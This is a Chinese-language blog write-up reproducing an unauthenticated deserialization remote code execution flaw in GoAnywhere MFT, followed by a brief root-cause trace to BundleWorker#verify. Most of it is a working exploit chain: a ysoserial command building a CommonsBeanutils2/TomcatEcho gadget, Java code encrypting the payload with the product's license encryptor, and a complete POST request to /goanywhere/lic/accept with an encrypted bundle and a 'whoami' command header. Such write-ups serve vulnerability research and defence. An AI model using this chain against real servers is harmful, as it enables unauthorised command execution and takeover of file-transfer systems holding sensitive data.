GoAnywhere 未授权反序列化RCE

警告
本文最后更新于 2023-02-06,文中内容可能已过时。

# 复现

下载su18的yso https://github.com/su18/ysoserial/releases/tag/v1.2

然后

1
cmd /c "java -jar ysuserial-1.2-su18-all.jar -g CommonsBeanutils2  -p EX-TomcatEcho > 1.bin"

然后java加解密

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import com.linoma.license.gen2.LicenseEncryptor;
import com.linoma.security.commons.crypto.CryptoException;
import org.apache.commons.codec.binary.Base64;

import java.nio.file.Files;
import java.nio.file.Paths;

public class Main {
    public static void main(String[] args) throws Exception {
        LicenseEncryptor.getInstance().initialize(false);
        byte[] bytes = Files.readAllBytes(Paths.get("C:\\Users\\a\\Downloads\\1.bin"));
        byte[] encrypt = encrypt(bytes, "1");
        byte[] encode = encode(encrypt, false);

        String s = new String(encode);
        System.out.println(s);
    }

    private static byte[] encrypt(byte[] var0, String var1) throws CryptoException {
        LicenseEncryptor var2 = LicenseEncryptor.getInstance();
        return var2.encrypt(var0, var1);
    }

    private static byte[] encode(byte[] var0, boolean var1) {
        Object var2 = null;
        byte[] var3 = Base64.encodeBase64(var0, var1, !var1);
        return var3;
    }
}
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
POST /goanywhere/lic/accept HTTP/1.1
Host: 172.16.16.145:8000
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
DNT: 1
Accept: */*
Referer: http://172.16.16.145:8000/goanywhere/auth/Login.xhtml
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5938
X-Token-Data:whoami

bundle=Jh88_jqGQWSbZmiCc1DErQhwOhCTLkYmA1yXgf86Ha5HF9IfVuQMLOfBS_fjlP7wTTEg2-Jx9nBDyFUKVTroXpFBt7zN1XDX58VKZCxCXlUD45d4laUUnNuzdyvNLT2b_gYKBi2-ny7fc2lOHNgalYV13mQzCTs0EgEUE9AuDUIMcFYx00pv4g4EOgEjeWbAx40rTtRby71AxapyXKy-4XChDHVlPB1AV3njBKGWT6gHdPxT8hb75Ycrpjdk9EQ1HW4WJiz4uaVBu7hXm_Eag15IpIWgojFy4hst8-q9YMms8Omq5lbdLabUHRcJAd6rLu6QrPLepYXQgGfMi_Qmj0qf5vXLfSX20cSBT_IEBlzzBR3lq_hiqrAfmZZCV3Y1HeMPpaMsmzL5zM1VTMX-5Pi5JGKMJ2Al2BZVZUUZQNqrcnueMVl1ZNhGMJ8eSFBCb4WGaNrhfgQ3sWUW3_A_ln_XwLi8z6XCOT5sJmFYZXBC4vYtY4leatX_o__lJHYPuA_TEmuEmEhIccj5Ou2xOvazmw9oXVUbM0vkPsb1UDyyTF0Ee85W0CUUCzb3rouvUDFaOZZLe08Z_Km2LgSq9Wr3fKojx_UevkOkOfwfiPlnJcQTRr45useRtOlHrJpP1iWSLi2vwK8bojMdCWzF13H8MmDjrJBCbcbChsXQkNcAJqkYa3y2SZXkwISRigFVLRnjDbyQLqLAzE0inCSf7GeXrZ5E6cD_6Bf7khmN7c8_NRPoJeOrRLivMQ5NLUuZHTlGBPF-6NAY-hcSxZkDgLRn17mvlOJ5Hpba21GeQwx12IfuRc5ZXCKJQzk6qhCvL-CsJSl8u9UVk7UXS5Ekq5xY6aMcfdo_9h3NrT5mavuxpf2pHRW81gt_iv9NB__HP-IvLK8RQsl1DVFTPs39pX3X0V8sns7r1hR0R4RxMJCdjDMjzch_WEqjabkA3TuliIFNg3caqDxIOX5SpCWtKTYTGhqXF7PgwNeBMVCN8ZkkeGUKEl6dapjeoT7xmKCgECIG0B5tBl9nnlozyd8fjCgwxO2eCyppJw6WFQXmnTfCgqiEy3Rb1V3TQJ28cR1ds7xXy3w5DPWTNJEyACCNH7S1AlMPE5McSokBWm4OrjxSpzQ1ZeSnjDjs3UxeTpBXxaqisqpKcx5bwQv7Qdeu6Ch1p9AkI5IwyIS1zxojOzR9YnD2e9L62gTR9RW4Ysn4GsCCFgm4el2jyYsM75ZvNJk5SU2-eH5znvX7ZY6UA8d9lfnF4UmRU5jDf-2jrB232h_UyYX-OzK8Dpy1z4g97qxd6p1l8LbGjNps_RgVRTpJ2271zCONm1fGF8GbbKc6aw4vL6gdf6yNV8uMnl7LeBqnW_m2r4nOY__gNJohlghZmzHhqedT6UPrbRGW17B-sxZ6xCuULmT5XS4vtq2cnt8-yk1RXCQiGCnXMUqhfO-CCeC4aOmrT_ao8L4gwXpoZcE43vEo2yelQtD3IzzCreRB1jz_Y_2FIP6SoFJmHVHXY4JMSNAZ9hSZab5Y0vyxIJtsuEPw9oGIR_bZIAGLuAQMD8CD6UfiXCvSq94giY9PWmd0F5187kSHrHGKZipdpsJFqR2_R3vIOwr-K4zsddwdBVBTn1dQRX5SOk7urIRca-BLXkyv8qcdapgDoeU2HjpNxqwxmd7CciJtolAEu0Pmq4HV8DIW-dPvFD_PXsm-spme1YrpZe0Xk28iXVUWqcnvSfjxKSUuJB6jQxtXYwQ5NrhS5AxPIqfsru9hBBRyRGBfNhSE62TgwPDhkB5mZB0Z46jGYzjJEUXMRL8G71L8E_Y1Gk5zWY1kJM7n7ZwXz9VYlXeyhUqU1hRgR5g_Cy1qAtgJP4wjR9fMQg-azeMOU72UurB8TEEG6xHZdpaxCsSBKnYZ94L1cPRxttBoBEx6dACH6xyLLWiKf5DAtVcavHHM6LBt4Mpax2_zzoeGUwvjgKtTV2dM-w-9_UAxUZqlpjyNuDhzvBNhCjbT4q-x-wbLuHGOuYV5t0kGaete7YKONKL5p3YWQK12awHJQsIJbznrEwuZQgfYwfVgJXndnZwlx7TRIYpqbA0GJ3ciRyGKIggAD5mZCl0wYDNAxHPof2ivK4g2d_MjiwuJFCbIXNEutgpLUj3fXjpL_PGoEhEtOs8CgLxyH4hwRmLsVvUME2FjwcDW8_zSLu_1Q2fK3ITDTUljcWbTqfkCpcYFBUHVH3z-ztW1aodFXVgpipVlgpIp5Aw7VdWiD_iiDwXM6kqhLcfYZOiJOPfHaReigk-35k-51xbt7puZ5Q-jSEs9YkP9qr5Q8Ins30SnkA0LKLlQZ22-dRTFpcoO35-HQDmwQWArrEoysWITPSXYPXL16kxkwkhIGJSRkfrYnqN7Q1Cdg3Z11c56YzjWUtIxffebqHkuhue7tUC62G0tUlAIQQYUbDjb0X-a99p4nmQGIXdnLCvVLMS0g8ks7vZZ_tLLIFKKz0psHg1iZ_kYqxK5T9UdBU3o3jffDFzaE15ZHkTM7Nhp1ZI4wZHCOnGL0sHlOpMLYRAiH9a4yzkXnXjqfzkLSsfaD2jVaM-oFPEavY_SoIL1VaWDvsGOrRspmGddtParAQl1yJoI_xR_haMH0uvjCQ63JZ8Skhu080s3_nkSqXM682smZqcuX5KHs4PQ4a8Ez9UvYB_vM06vLYv9qi7C6z7pkNaWdC7eFOj8YFuX7KinOGJUew73xoKDuvmWNHmZqE7CRr42fFcR7nZAiv-mVLJgdRtuk6pQ6cK8pkvI0nEJ6Q9r4P9odGzAyrRryDxOf7LPcKbdQBP9C6k6Jm_UEmHpyC4AolJSMH0RwT02mvLd58XgcA6rieDD6w2aUARa7QXfLOpjitkV1smGZhn7txWfj2lzibZJDiN59pLf4V1YclRY3_HJlQiXvi1IUZYe9bKt4HaPaMVb1m9LlAu0l8AE1JcB4zzOpzfm784rJ6gnR6p_-QCCvO0yrp-wHrVeawcFoxtaqbTRXRHQMLwuXOZVrLDokyrXsv8bF_VhIl10pFFm8tXQ2Ah-CY-7d-fyFHtG6-GFS83E0lQbZnwKX84imVBQc-pZnTuhKxRCfOauchXyfF9vyUGykd6RkPXAHQaZYMaI22XpIY1Yes-nEnJor22Ct9CIqSzkRFGw6rBLfKS_qw02laLglUN_DOvLubAVV0_cX_6fiMOb_vZVYmjPeKHliagktHeKZHH53yKTLwT_R_BGIxjrV91ZCXEMOwEgg7ztxWfBwX4a52Hf2B4232EWE4WqhXV-5kFmFH0V-ZT2DQsrlWn0I_iDKzi-kFK3oXJd1x68PzwN3L5bqV4yRi8NcIYEWVEbYaqS_T5wUOYb54l6HGfKUQNtXNu1mqclPsLnj3cfeBqVNtS3-WKrkK-3VN5p4ht1nl4WOo0lyjBz2TfU-lQl9XVHLKONLV9kJSvVig6SuFbDn5au-XjER-aTBWIPrHXkUhVA6t0SPCUwkqwFe5RetfdfMw4D-mYGoM7nzXp3LQH2t2A6mV4CwNxTFdFPrALKWjl1gdZi054qrVnEBdntZ2bDT5zwLxqDyjgWWSvnSqdke83zNeJY0bAU-HaLE7BLMKOlaDTG2S31vnV-SCq7DQDjPCjPmpjJxTeE89j1eI-rqB_68t3AOqavB46-XzabUQ3vIKsH0fBkxFWVIHAlA8AgXXpdkwx7Qbi1tOggqhbWi9eif23eeE3yfn0Nld0dxaOlegv9wul1u4ZRl1o2wgDYVKlhq-7_xyzJU_JZRyj3Jl-4dUduNQO1ZMizOXX5_ObypljWW1Kk9DN97f39oF1UOWYML5LfIZIukqecmxh4Q3k5i4WXWcSk3X0-Qi63_ULgldKhKAB1ZkLX_bhXoCnBlLlrlzIPrLbopUkd-2-MBHMs9eQOXTmcbOV2qIEvxfo_KOzUFaS08o7lVI9eJJKMNldCzGOEcdf83z9j-pA91hj33RcRc8kmZ9bKbdunKvqdZjzrKfiiPjaiEu-KwkkDWcHW5FW9E4lmCnPzRajRC8OBpBYgsu9EYPyqUA0RXxXBG34sMCBpiCJfti1cYN7qmCA45yS02kHe2xYm8scju3VVYuVsqsNMljE0fiSAo1goeasb3gBkVdWszrzuybFvWtlPAj3qjx1LQXExwcplC8edV4vckJ_9fohcSaKSbTv6MXdrpA81Nb9PRnJGaV1s3EAx8zT9BsKuZd5AW7nkpaQDvQ8IEUWtafKsF6liCm4evql8n3qWFUAppnvucPCDYiEyip2SGCidgjr0rRz3stUDP4wyI3cwDhLIC7RRJbdCC6Ezmce4N7Tn2n0_f63vcE16kkERp50KIcJ9JH6nkDARIlSvCXwngL9PlRhEpbrqqQ2TTyAdGE_TykOSHNqngkO-36zqmAIyoB3VjQ-94NO_Js-b667VMUpoe3P9Usgs7tNG6Q3mft9Mj4kVEomCQpCdJ_Bsmd5IdHuWq87xnmerbCQnOGaTAYDb31jKwhi0UrxSkNVx0RJ1OfjEsrEGogB6H6zRGGrD1m_fBgsErWBnuxZp0OlXWIqsFcIGA7dm096Qt-x0v4Kw3Uzpnd8VHGup_p_EIG4w0IWsel59pFYMZBDJpKvM9_L7mYHmsw_VVHspcGx1_UXBcWeMFzj8tEmdJqs8ij2ODWEn_25FUqBLJ4hEL9qn4ertqypGunt7URgW573pGiTxu9FVuExz1XPJB3Kdj2XtSCJCHfyambxlSZplTB-kDUsCdMLBmpsOtrxGCReq2Iluy67uyOBOwaQfwTN5EFsB-KSXMCqhF5QyfHAaM-TIJtNRKAJaM7B25Op5fNKkW-8kLfP8_nYGP5b5Neb7WZDTbmheVhppVlGZwjxI7c88hGmRIhxXjHmolA1vYDW7pyrQdj7GJGjsEi2CSsgdBtlHSghwS64R11x-Ps6yWegNbA3CqU7jCOtDXPKEOHeySNRgPuTHegCQJ8wSgfnpSHmwxEvk_1B6H-kuqHAqAmaxbTadaZbdGIeOi7s8nYI6a5klwm-or7llzB9yvPDBm-JB3c6D-Qlo1xDV5qtWZA44xg6ubBu6t6n_CHPk8zY1ZdJFiT04JCZnA6h6YY8Sr-vDifAnkn-zihidhrCSs8k-BL4tWFArg7BqQrEZ55TWhcN480_K94RXImnBOTD5VYuLc62M1lJ1vH5mof8cPvRRCJGFyYHBoa6LqDgVyMNUCUiF3BHttC42CtdOFBxTXzTSAYo6-GYrEHhqjPHRFCErLFIxoD7MuufE2AgIcHZpWMqw-orCmosDlPdnwor2bhK_pAxTKt3PDl1dWkZGy2hwBzxzmwi8KFM4akKKMEpSgddTwdO6qHfzELNXdGdlTP2zYkiBGXbpEo1RriD9-wFIbaid4nvMaz-xpkd5p1wosqlG6eqP7-9U2fZ-lMrWjHk8jeDX2yvvG2B32V5KBJl39IK8HnBJwq_zf8jGac1WbJUvC-whmELgOEYrMCKYwRrJE5d98YqEtZi0-Av20yQKztQIn4zUVFwMvlVLpWxDfRLXILIxmFrBMv3iZwoAo6mVKTS_LyJtz99aEcvFMFDYTnQXKGRnz5EX5uWrJ8UOg7H-QjVC8ADC9ty_0xDefx0WD8GYDSinecI_s_5LMln1DLExzmpFlcMj08r0cY12eYDlVXvSBjCTpqIGfgsea1Lu9m04pnmidTlL0vVs7NYXehXhJA-ykXbNVfa_qysR2dY8CyfUBKIlhhKNWE_ZliL__tHqkm9W-MReaLWhtA789n_-E_6lfvju5yohHwATJTjnUboGgLPVUhh-0YLf_CefMDeJz2KIRTnFb9CnnwacOwVBbn3XnGw5cjqIm9Hr1tsOwXvSd8vRZOpQHw1UCbrcK8QTqXLiJOsWXYymqkkcUfU1Km9InuJVJbVE947wLqPU1SQ

image.png

# 原理

从Servlet一步一步跟入,直到com.linoma.license.gen2.BundleWorker#unbundle

image.png

com.linoma.license.gen2.BundleWorker#verify readObject

image.png

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。